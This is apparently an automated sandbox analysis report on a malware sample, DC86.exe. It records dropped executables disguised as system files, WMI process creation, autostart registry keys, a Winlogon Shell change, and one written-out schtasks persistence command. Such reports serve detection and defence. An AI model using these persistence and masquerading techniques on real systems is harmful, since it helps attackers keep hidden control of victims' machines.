Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: mscoree.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: kernel.appcore.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: version.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: uxtheme.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: windows.storage.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: wldp.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: profapi.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: cryptsp.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: rsaenh.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: cryptbase.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: sspicli.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: mscoree.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: kernel.appcore.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: version.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: uxtheme.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: windows.storage.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: wldp.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: profapi.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: cryptsp.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: rsaenh.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: cryptbase.dll
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: sspicli.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: mscoree.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: apphelp.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: version.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: wldp.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: profapi.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\DC86.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: DC86.exe

Static file information: File size 2345705 > 1048576

Source: DC86.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DC86.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DC86.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DC86.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DC86.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DC86.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DC86.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: DC86.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DC86.exe
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.pdb source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2314945218.0000000003104000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\obippivd\obippivd.pdb source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2314945218.0000000003104000.00000004.00000800.00020000.00000000.sdmp

Source: DC86.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DC86.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DC86.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DC86.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DC86.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline"
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline"
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe

File created: C:\hyperIntoBroker\__tmp_rar_sfx_access_check_4911031

Jump to behavior

Source: DC86.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FF640 push ecx; ret	0_2_009FF653
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FEB78 push eax; ret	0_2_009FEB96
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34A6755D push ebx; iretd	5_2_00007FFD34A6756A
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34A60C50 push esi; ret	5_2_00007FFD34A6135F
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD346771FE push ds; retf	38_2_00007FFD346771FF
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD346771FE push ds; retf	39_2_00007FFD346771FF
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD346871FE push ds; retf	40_2_00007FFD346871FF
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Code function: 46_2_00007FFD346500BD pushad ; iretd	46_2_00007FFD346500C1

Source: hyperProviderbrokermonitorNet.exe.0.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: PuhmblZdAcSNmlRDfzjrgW.exe.5.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: PuhmblZdAcSNmlRDfzjrgW.exe0.5.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: PuhmblZdAcSNmlRDfzjrgW.exe1.5.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: PuhmblZdAcSNmlRDfzjrgW.exe2.5.dr	Static PE information: section name: .text entropy: 7.572941728975947
Source: WmiPrvSE.exe.5.dr	Static PE information: section name: .text entropy: 7.572941728975947

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\PuTbcYNO.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\zSWmQQDs.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\gBkGwLsc.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\sBmPHITf.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\BfvFrBjN.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Program Files (x86)\Windows Defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\iLGHwdYd.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\GQKmsfxg.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\ZkzjoDJQ.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\oncOKnjP.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\XXbRMRdv.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\DC86.exe	File created: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\PdatkTco.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\RGruEKtj.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\oOURfLEr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\LNOVbeou.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Jump to dropped file

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

File created: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\PuTbcYNO.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\GQKmsfxg.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\oncOKnjP.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\zSWmQQDs.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\iLGHwdYd.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\gBkGwLsc.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File created: C:\Users\user\Desktop\XXbRMRdv.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\PdatkTco.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\oOURfLEr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\LNOVbeou.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\BfvFrBjN.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\sBmPHITf.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\ZkzjoDJQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File created: C:\Users\user\Desktop\RGruEKtj.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hyperProviderbrokermonitorNet	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW	Jump to behavior

Drops PE files to the user root directory

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

File created: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hyperProviderbrokermonitorNet	Jump to behavior
